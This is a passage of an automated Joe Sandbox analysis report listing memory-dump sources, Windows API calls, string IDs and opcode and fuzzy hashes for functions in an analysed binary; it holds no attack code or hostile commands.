                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                          • Instruction ID: 2a96b8367cace1afad692a6396fe394f5d90613a5233e6c68f2f231d7c099768
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6511BF72EDCA0301F7E631E9D66537501C06F763A4F990634EA6EC76D68E2CA8438110
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A6BF
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A6DE
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A706
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A717
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A728
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                          • Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                          • Instruction ID: 55a59b89116f444730a51805d09b10599f0baa8b9d3eec15cb4270552081143d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC110A20B0C64A42FBDBB326569127961D15F997A0E544334E83ECBED7DE2CA8538702
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                          • Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                          • Instruction ID: 9590f6274f9a0b8e925eff4ed37dfae0f324e541414a8ae9e047de414f35a999
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82119321B0D20F42FBEBB22655511B922C25F99360E585738D93ECBED3EE2CB4535213
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: verbose
                                                                                                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                                                                                                          • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                          • Instruction ID: 0a5c36030b87fc5d76ffea6bc4dc068f88afea5c9efa78f4ec6336f90f23003e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42918122A0C64A81E7A6BE25D46037D36D1AB80B58F884136DA5EC7BE5DF3CF4478342
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                          • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                          • Instruction ID: a40eb794d7593472c3402a88314c33f723f0272d2e6d4da0f3fa7fb1489b88c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E819CB2E0C20BC5FBE77E29D11027966E0AB12B48F558035DA0ED7AD5DF2DE9439603
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                          • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                          • Instruction ID: 8290f90d64dd1216b5379b104bd6231e8c664497fee9e8ab92a0fd9bb1848711
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A851AF3AB1D6828ADB96FB15E414AB977D1EB44B88F548130DA4D837C4EF7EE842C700
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                          • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                          • Instruction ID: 401d0e91934f334a51a7c868099533b63e69ffa814db80927673f9bef5a6b04f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05617C32A0CBC585D7A2AB15E4403EAB7A0FB85794F144225EB9C43BDADF7DE191CB00
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                          • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                          • Instruction ID: 6cf0da1144b10d95b722f030f1893c6a95db3817b85a84a3bdddbeba2bd644ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24519072B1C2C286EBB5BB2190543A87BD0EB54B94F244135DA6D87BD6CF3EE452CB01
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,?,00007FF641F2324C,?,?,00007FF641F23964), ref: 00007FF641F27642
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                                                          • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                          • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                          • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                          • Instruction ID: 3080bf867c1f1e6bcd3d44f32ed38cfceccad4573ccc06d7b4f51c3d7ca14aac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC31C561A1DAC145EBB2BB25E4107EA62D4EB94BE0F444331EE6D837C9EF2CD2068700
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                          • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                          • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                          • Instruction ID: 0b12d76c933e147f16b7ab6f5eb4d92bcfcdfe4f4076c5e78149d00928e58498
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58118B7262CA8581FBA2BB10F951BE973A4FB44B84F905135DA8D87685CF3DD60AC704
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                          • API String ID: 1878133881-653037927
                                                                                                                                                                                                                          • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                          • Instruction ID: 7a031847d0ea60b1451ce2148fee9864f1de37964c4f3073289876272064bdd6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92119D7262CB8581FBA1BB10F951BE933A4FB44B84F905135DA4C87685CF3DD60AC704
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                          • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                          • Instruction ID: 7caeac66c2c06d5285d6954c26c6832ff2aa86b626e3137aaaeafd2db78decf6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD1DE32B2CA8589E762EF69D4502AC37A1FB447D8B144226CE5E97FD9DE38D007C309
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                          • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                          • Instruction ID: bc87d278eb1abca221164b2ea97e8cca1af883d9c1519169da1986953ec2275d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0510372F0861A8AEB95FF6499552BC27E1AF10758F110135DD1E93EE6DF38A443C702
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                          • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                          • Instruction ID: 53cff9c26b31722431c03e534cee2c21a71ba83ca0f055b91b7fcecc594d4744
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99517822A0C6458AFB95FFB1D4403BD23E1AB48B98F148135DE0987A89DF38D4838752
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                                                                                          • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                          • Instruction ID: ab310ddc08292eca36e7a18974552602556a7d0fa3ccb8ddc192f8d0194ff0db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A118A31A1C18241F796FBAAE9442F913D2EF94790F448431DE4D47BDACD2DD4C28504
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
